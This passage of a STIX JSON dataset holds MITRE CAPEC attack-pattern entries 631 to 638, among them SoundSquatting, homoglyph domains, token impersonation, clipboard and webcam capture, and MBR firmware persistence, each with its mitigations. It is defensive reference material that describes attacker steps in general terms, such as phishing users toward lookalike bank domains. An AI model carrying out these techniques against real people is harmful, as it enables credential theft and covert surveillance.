"attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SoundSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homophone Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful SoundSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate guaranteebanking.com login page.\n The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user's legitimate guaranteebanking.com credentials to log into the user's account and steal any money which may be in the account.See also: SoundSquatting vulnerability allows an adversary to impersonate a trusted domain and leverages a user's confusion between the meaning of two words which are pronounced the same into visiting the malicious website to steal user credentials." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted, receives a consistent amount of traffic, and is a homophone.

    2. Techniques
    Research popular or high traffic websites which are also homophones.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the SoundSquatted URL.

    2. Techniques
    Register the SoundSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the SoundSquatted domain.

    2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the SoundSquatted domain.
    Assume that a user will unintentionally use the homophone in the URL, leading the user to the SoundSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73bbe3cf-9d46-458f-b272-44e8c8bdbfdd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential SoundSquatted domains and forward to legitimate domain.", + "id": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-631-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a91eb59a-9010-4d4f-baca-16b413704ed6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.", + "external_references": [ + { + "external_id": "CAPEC-632", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/632.html" + }, + { + "external_id": "CWE-1007", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1007.html" + } + ], + "id": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Homograph Attack via Homoglyphs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homoglyph Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful Homograph attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is bankofamerica.com, where the 'a' and 'e' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.\n The user is directed to the adversary's website, which appears as if it is the legitimate bankofamerica.com login page.\n The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user's legitimate bankofamerica.com credentials to log into the user's account and steal any money which may be in the account.\n Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials.See also: CVE-2012-0584 CVE-2009-0652 CVE-2005-0233 CVE-2005-0234 CVE-2005-0235 CVE-2005-0236 CVE-2005-0237 CVE-2005-0238" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

    2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the URL containing the homoglpyh character(s).

    2. Techniques
    Register the Homograph domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the Homograph domain.

    2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the to click on a link leading the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc79c713-e3ec-414c-8426-5e3cdf4a0f13", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize browsers that can warn users if URLs contain characters from different character sets.", + "id": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-632-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.", + "external_references": [ + { + "external_id": "CAPEC-633", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/633.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + } + ], + "id": "attack-pattern--bec2babe-f38d-49ed-a901-4c7dbbe87b1e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Token Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic (By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed.)", + "Gain Privileges (By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had.)", + "Hide Activities (Faking the source of data or services can be used to create a false trail in logs as the target will associated any actions with the impersonated identity instead of the adversary.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits the target system's audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a system.", + "external_references": [ + { + "external_id": "CAPEC-634", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/634.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Audio Capture", + "external_id": "T1123", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1123" + }, + { + "description": "Video Capture", + "external_id": "T1125", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1125" + }, + { + "description": "Amrita Mitra, What is Car Whisperer?, 2017--03---08, The Security Buddy", + "external_id": "REF-653", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-car-whisperer/" + }, + { + "description": "What is Bluesnarfing?, 2017--03---13, Finjan Mobile", + "external_id": "REF-654", + "source_name": "reference_from_CAPEC", + "url": "https://www.finjanmobile.com/what-is-bluesnarfing/" + } + ], + "id": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Probe Audio and Video Peripherals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability.", + "An adversary can capture and record from audio peripherals in a vehicle via a Car Whisperer attack. If an adversary is within close proximity to a vehicle with Bluetooth capabilities, they may attempt to connect to the hands-free system when it is in pairing mode. With successful authentication, if an authentication system is present at all, an adversary may be able to play music/voice recordings, as well begin a recording and capture conversations happening inside the vehicle. Successful authentication relies on the pairing security key being set to a default value, or by brute force (which may be less practical in an outside environment) Depending on the sensitivity of the information being discussed, this scenario can be extremely compromising.", + "An adversary may also use a technique called Bluebugging, which is similar to Bluesnarfing but requires the adversary to be between 10-15 meters of the target device. Bluebugging creates a backdoor for an attacker to listen/record phone calls, forward calls, send SMS and retrieve the phonebook." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Knowledge of the target device's or application’s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect audio and video data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown code from executing on a system through the use of an allowlist policy.", + "id": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf046fa-0379-4600-9440-4e02b4dba1f4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch installed applications as soon as new updates become available.", + "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4780d621-4627-424b-903c-3f4d714d86a1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-635", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/635.html" + }, + { + "external_id": "CWE-162", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/162.html" + }, + { + "description": "Masquerading: Double File Extension", + "external_id": "T1036.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/007" + } + ], + "id": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alternative Execution Due to Deceptive Filenames", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70" + ], + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", + "id": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-635-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d2c9b192-26b4-46a5-a6c9-aca496c5e896", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "spec_version": "2.1", + "target_ref": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.", + "external_references": [ + { + "external_id": "CAPEC-636", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/636.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Data Obfuscation: Steganography", + "external_id": "T1001.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1001/002" + }, + { + "description": "Obfuscated Files or Information: Steganography", + "external_id": "T1027.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/003" + }, + { + "description": "Obfuscated Files or Information: Compile After Delivery", + "external_id": "T1027.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/004" + }, + { + "description": "Signed Binary Proxy Execution: Compiled HTML File", + "external_id": "T1218.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1218/001" + }, + { + "description": "Template Injection", + "external_id": "T1221", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1221" + }, + { + "description": "Means, Ryan L., Alternate Data Streams: Out of the Shadows and into the Light, SANS Institute", + "external_id": "REF-493", + "source_name": "reference_from_CAPEC", + "url": "https://www.giac.org/paper/gcwn/230/alternate-data-streams-shadows-light/104234" + } + ], + "id": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Hiding Malicious Data or Code within Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87" + ], + "x_capec_prerequisites": [ + "The operating system must support a file system that allows for alternate data storage for a file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools.", + "id": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-636-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which they are unauthorized.", + "external_references": [ + { + "external_id": "CAPEC-637", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/637.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Clipboard Data", + "external_id": "T1115", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1115" + } + ], + "id": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Collect Data from Clipboard", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an application that allows copying sensititve data to clipboad: An adversary first needs to find an application that allows copying and pasting of sensitive information. This could be an application that prints out temporary passwords to the screen, private email addresses, or any other sensitive information or data

Experiment

  1. Target users of the application: An adversary will target users of the application in order to obtain the information in their clipboard on a periodic basic

    2. Techniques
    Install malware on a user's system designed to log clipboard contents periodically
    Get the user to click on a malicious link that will bring them to an application to log the contents of the clipboard

Exploit

  1. Follow-up attack: Use any sensitive information found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect clipboard data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.", + "id": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca571029-201a-4dbc-aaa9-e3179a745f60", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "spec_version": "2.1", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust identification and audit/blocking via using an allowlist of applications on your system. Malware may contain the functionality associated with this attack pattern.", + "id": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19f949ab-5e38-4bef-be5d-dcdcfbc6b2eb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "spec_version": "2.1", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits systems features and/or improperly protected firmware of hardware components, such as Hard Disk Drives (HDD), with the goal of executing malicious code from within the component's Master Boot Record (MBR). Conducting this type of attack entails the adversary infecting the target with firmware altering malware, using known tools, and a payload. Once this malware is executed, the MBR is modified to include instructions to execute the payload at desired intervals and when the system is booted up. A successful attack will obtain persistence within the victim system even if the operating system is reinstalled and/or if the component is formatted or has its data erased.", + "external_references": [ + { + "external_id": "CAPEC-638", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/638.html" + }, + { + "description": "Pre-OS Boot:Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "EQUATION GROUP: QUESTIONS AND ANSWERS (1.5), 2015--02, Kaspersky Lab HQ", + "external_id": "REF-664", + "source_name": "reference_from_CAPEC", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + }, + { + "description": "Preston Hood, Hard Drive Firmware Implant IRATEMONK, 2014--10---26, PJHoodsCo Blog", + "external_id": "REF-665", + "source_name": "reference_from_CAPEC", + "url": "https://blog.pjhoodsco.org/hard-drive-firmware-implant-iratemonk/" + }, + { + "description": "Bruce Schneier, IRATEMONK: NSA Exploit of the Day, 2014--01---31, Schneier on Security", + "external_id": "REF-666", + "source_name": "reference_from_CAPEC", + "url": 